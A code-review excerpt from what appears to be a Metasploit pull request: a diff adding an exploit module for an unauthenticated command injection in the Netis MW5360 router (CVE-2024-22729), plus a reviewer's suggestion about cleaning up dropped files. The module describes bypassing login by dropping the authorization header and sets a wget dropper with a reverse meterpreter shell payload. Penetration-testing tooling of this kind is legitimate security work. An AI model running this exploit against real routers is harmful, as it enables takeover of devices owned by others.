modules/exploits/linux/http/netis_unauth_rce_cve_2024_22729.rb

```diff
@@ -0,0 +1,143 @@
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Netis router MW5360 unauthenticated RCE.',
+        'Description' => %q{
+          Netis router MW5360 has a command injection vulnerability via the password parameter on the login page.
+          The vulnerability stems from improper handling of the "password" parameter within the router's web interface.
+          The router's login page authorization can be bypassed by simply deleting the authorization header,
+          leading to the vulnerability. All router firmware versions up to `V1.0.1.3442` are vulnerable.
+          Attackers can inject a command in the 'password' parameter, encoded in base64, to exploit the command injection
+          vulnerability. When exploited, this can lead to unauthorized command execution, potentially allowing the attacker
+          to take control of the router.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'Adhikara13' # Discovery of the vulnerability
+        ],
+        'References' => [
+          ['CVE', '2024-22729'],
+          ['URL', 'https://attackerkb.com/topics/MvCphsf4LN/cve-2024-22729'],
+          ['URL', 'https://github.com/adhikara13/CVE/blob/main/netis_MW5360/blind%20command%20injection%20in%20password%20parameter%20in%20initial%20settings.md']
+        ],
+        'DisclosureDate' => '2024-01-11',
+        'Platform' => ['linux'],
+        'Arch' => [ARCH_MIPSLE],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Linux Dropper',
+            {
+              'Platform' => ['linux'],
+              'Arch' => [ARCH_MIPSLE],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['wget'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => false,
+          'RPORT' => 80
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The Netis MW5360 router endpoint URL', '/' ]),
+      OptInt.new('CMD_DELAY', [true, 'Delay in seconds between payload commands to avoid locking', 30])
+    ])
+  end
+
+  def execute_command(cmd, _opts = {})
+    # store name of payload and cleanup payload file when session is established (see def on_new_session)
+    @payload_name = cmd.split('+x')[1].strip if cmd.include?('chmod +x')
```

Comment:
`register_files_for_cleanup` can be call anywhere in the execution flow. The attempt to delete the file is done once the session is set. So, I believe you don't need to set an instance variable and call this helper in `on_new_session`.

```suggestion
    if cmd.include?('chmod +x')
      register_files_for_cleanup(cmd.split('+x')[1].strip)
    end
```

Reply:
Cool. Learned something new ;-). See https://github.com/rapid7/metasploit-framework/pull/19188/commits/4e26704d73a213d8cd2539a26dd98dc81c02247b.